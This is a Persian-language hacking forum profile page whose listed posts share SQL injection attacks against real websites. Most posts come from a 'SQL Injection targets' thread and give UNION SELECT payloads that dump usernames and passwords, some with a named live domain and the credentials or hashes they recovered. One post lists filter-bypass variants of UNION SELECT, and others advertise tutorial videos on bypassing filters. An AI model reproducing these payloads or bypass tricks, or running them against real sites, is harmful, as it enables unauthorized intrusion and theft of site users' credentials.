رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

parsa2016

کاربر رسمی
  • ارسال ها

    113
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    8

parsa2016 آخرین بار در روز آگوست 23 2021 برنده شده

parsa2016 یکی از رکورد داران بیشترین تعداد پسند مطالب است !

9 دنبال کننده

درباره parsa2016

آخرین بازدید کنندگان پروفایل

2,002 بازدید پروفایل

دستاوردهای parsa2016

Newbie

Newbie (1/14)

667

امتیاز

  1. parsa2016

    تارگت های Sql Injection

    target: [Hidden Content],2,3,group_concat%28User_ID,0x3a,Username,0x3a,Password%29,5,6,7,8+from+userCake_Users-- دوستان دقت کنید که یوزر و پسورد توی تایتل سایت هستش!
  2. به نام خدا پارت پنجم موضوعات پارت: 1- بایپس پوزر نیم و پسورد 2- متد جالبی برای زمانی که union+select جواب نمی ده ! تشکر فراموش نشود. part5.rar
  3. parsa2016

    تارگت های Sql Injection

    [Hidden Content],2,3,4,group_concat%28admin_username,0x7c,admin_password%20%29,6+from+admin-- admin page: [Hidden Content] برید حالشو ببرید.
  4. به نام خدا این هم از فیلم های آموزشی این پارت فک کنم بهترین فیلم های آموزشی توی انجمن باشن! bypass union+select.rar
  5. به نام خدا پارت چهارم موضوعات پارت: 1- بایپس های دستور select توی این آموزش ، بخش دوم آموزش داده شده. تشکر فراموش نشود. part4.rar
  6. parsa2016

    تارگت های Sql Injection

    target: [Hidden Content] user: admin pass: d37a8a0af6d20a50da19a734f2403375
  7. parsa2016

    تارگت های Sql Injection

    www.teledata.co.id/news_detail.php?nid=-2+union+select+1,concat_ws(0x3a,userid,username,password),3,4+from+mycms_users-- user: Admin pass: 4p@ssword
  8. parsa2016

    تارگت های Sql Injection

    [Hidden Content],concat_ws%280x3a,userid,username,password%29,3,4+from+mycms_users--
  9. به نام خدا چند روش برای بایپس ارور different column [Hidden Content] and (select 1)%20= (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ================================================================= [Hidden Content] and (select 1) = (select 2) 0union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ================================================================= [Hidden Content]/**/union/**/all/*!50000select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/ ================================================================== [Hidden Content]/**/union/**/Select/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/ ================================================================== [Hidden Content]/**/union/**/select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/ =================================================================== [Hidden Content]/**/union/**/select*/(0x312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c3233)/**/ =================================================================== [Hidden Content]+union+(select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)-- =================================================================== UN / ** / ION / ** / SE / ** / LECT / ** / user, password from users =================================================================== [Hidden Content],group_concat(table_name),3,4,5,6, 7+from+information_schema.tables+where+table_schem a=database()*/--
  10. parsa2016

    تارگت های Sql Injection

    [Hidden Content],group_concat%28login,0x3a,pwd%29,3,4,5+from+corpsport_web.login
  11. parsa2016

    تارگت های Sql Injection

    [Hidden Content],2,convert%28concat%28name,0x3a,password%29%20using%20latin1%29,4,5,6,7,8+from+admin
  12. parsa2016

    تارگت های Sql Injection

    [Hidden Content],group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11+from+users
  13. parsa2016

    تارگت های Sql Injection

    [Hidden Content],0x3a,user_login,0x3a,user_pass%29+from+spirityoga.wp_bpcq1y_users+--+
×
×
  • ایجاد مورد جدید...